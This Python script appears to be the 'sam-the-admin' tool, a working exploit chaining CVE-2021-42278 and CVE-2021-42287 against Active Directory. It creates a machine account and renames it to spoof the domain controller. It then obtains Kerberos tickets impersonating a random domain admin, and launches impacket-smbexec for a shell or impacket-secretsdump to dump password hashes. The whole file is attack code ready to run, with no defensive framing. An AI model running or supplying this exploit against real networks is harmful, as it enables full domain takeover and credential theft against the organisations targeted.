from __future__ import division from __future__ import print_function from __future__ import unicode_literals from impacket import version from impacket.examples import logger from impacket.examples.utils import parse_credentials import argparse import logging import sys import string import random import ssl import os from binascii import unhexlify import ldapdomaindump import ldap3 import time from utils.helper import * from utils.addcomputer import AddComputerSAMR from utils.S4U2self import GETST characters = list(string.ascii_letters + string.digits + "!@#$%^&*()") def samtheadmin(options): new_computer_name = f"SAMTHEADMIN-{random.randint(1,100)}$" new_computer_password = ''.join(random.choice(characters) for _ in range(12)) domain, username, password, lmhash, nthash = parse_identity(options) ldap_server, ldap_session = init_ldap_session(options, domain, username, password, lmhash, nthash) cnf = ldapdomaindump.domainDumpConfig() cnf.basepath = None domain_dumper = ldapdomaindump.domainDumper(ldap_server, ldap_session, cnf) MachineAccountQuota = 10 for i in domain_dumper.getDomainPolicy(): MachineAccountQuota = int(str(i['ms-DS-MachineAccountQuota'])) rootsid = domain_dumper.getRootSid() dcinfos = get_dc_hosts(ldap_session, domain_dumper) if len(dcinfos) == 0: logging.critical("Cannot get domain info") exit(1) dcinfo = dcinfos[0] found = False if options.dc_host: for d in dcinfos: if any(name.lower() == options.dc_host.lower() for name in d['dNSHostName']): dcinfo = d found = True break if not found: print("[-] WARNING: Target host is not a DC") dc_host = dcinfo['name'][0].lower() dcfull = dcinfo['dNSHostName'][0].lower() logging.info(f'Selected Target {dcfull}') domainAdmins = get_domain_admins(ldap_session, domain_dumper) random_domain_admin = random.choice(domainAdmins) logging.info(f'Total Domain Admins {len(domainAdmins)}') logging.info(f'will try to impersonate {random_domain_admin}') # udata = get_user_info(username, ldap_session, domain_dumper) if MachineAccountQuota < 0: logging.critical(f'Cannot exploit , ms-DS-MachineAccountQuota {MachineAccountQuota}') exit() else: logging.info(f'Current ms-DS-MachineAccountQuota = {MachineAccountQuota}') logging.info(f'Adding Computer Account "{new_computer_name}"') logging.info(f'MachineAccount "{new_computer_name}" password = {new_computer_password}') # Creating Machine Account addmachineaccount = AddComputerSAMR( username, password, domain, options, computer_name=new_computer_name, computer_pass=new_computer_password) addmachineaccount.run() # CVE-2021-42278 new_machine_dn = None dn = get_user_info(new_computer_name, ldap_session, domain_dumper) if dn: new_machine_dn = str(dn['dn']) logging.info(f'{new_computer_name} object = {new_machine_dn}') if new_machine_dn: ldap_session.modify(new_machine_dn, {'sAMAccountName': [ldap3.MODIFY_REPLACE, [dc_host]]}) if ldap_session.result['result'] == 0: logging.info(f'{new_computer_name} sAMAccountName == {dc_host}') else: logging.error('Cannot rename the machine account , target patched') exit() # Getting a ticket getting_tgt = GETTGT(dc_host, new_computer_password, domain, options) getting_tgt.run() dcticket = str(dc_host + '.ccache') # Restoring Old Values logging.info(f"Resting the machine account to {new_computer_name}") dn = get_user_info(dc_host, ldap_session, domain_dumper) ldap_session.modify(str(dn['dn']), {'sAMAccountName': [ldap3.MODIFY_REPLACE, [new_computer_name]]}) if ldap_session.result['result'] == 0: logging.info(f'Restored {new_computer_name} sAMAccountName to original value') else: logging.error('Cannot restore the old name lol') os.environ["KRB5CCNAME"] = dcticket executer = GETST( None, None, domain, options, impersonate_target=random_domain_admin, target_spn=f"cifs/{dcfull}" ) executer.run() adminticket = str(random_domain_admin + '.ccache') os.environ["KRB5CCNAME"] = adminticket # will do something else later on fbinary = "/usr/bin/impacket-smbexec" if options.dump: fbinary = "/usr/bin/impacket-secretsdump" cmd = f"{fbinary} -target-ip {options.dc_ip} -dc-ip {options.dc_ip} -k -no-pass @'{dcfull}'" get_shell = f"KRB5CCNAME='{adminticket}' {cmd}" if options.shell: os.system(get_shell) print("[*] You can deploy a shell when you want using the following command:") print(f"[$] {get_shell}") if options.purge: os.system("rm *.ccache") if __name__ == '__main__': # Init the example's logger theme logger.init() print((version.BANNER)) parser = argparse.ArgumentParser(add_help=True, description="SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain") parser.add_argument('account', action='store', metavar='[domain/]username[:password]', help='Account used to authenticate to DC.') parser.add_argument('-domain-netbios', action='store', metavar='NETBIOSNAME', help='Domain NetBIOS name. Required if the DC has multiple domains.') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') parser.add_argument('-shell', action='store_true', help='Drop a shell via smbexec') parser.add_argument('-purge', action='store_true', help='Purge all collected .ccache files') parser.add_argument('-dump', action='store_true', help='Dump Hashs via secretsdump') parser.add_argument('-port', type=int, choices=[139, 445, 636], help='Destination port to connect to. SAMR defaults to 445, LDAPS to 636.') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' '(KRB5CCNAME) based on account parameters. If valid credentials ' 'cannot be found, it will use the ones specified in the command ' 'line') group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)') group.add_argument('-dc-host', action='store', metavar="hostname", help='Hostname of the domain controller to use. If ommited, the domain part (FQDN) ' 'specified in the account parameter will be used') group.add_argument('-dc-ip', action='store', metavar="ip", help='IP of the domain controller to use. Useful if you can\'t translate the FQDN.' 'specified in the account parameter will be used') parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) domain, username, password = parse_credentials(options.account) account_format_invalid = False try: while domain is None or domain == '': account_format_invalid = True logging.critical('Domain should be specified!') domain = input("[*] Please specify a domain: ") if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: account_format_invalid = True from getpass import getpass password = getpass(f"[*] Password for account {username}: ") if options.aesKey is not None: options.k = True if account_format_invalid and password and password != "": options.account = f"{domain}/{username}:{password}" if account_format_invalid and not password and password == "": options.account = f"{domain}/{username}" samtheadmin(options) except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() print(str(e))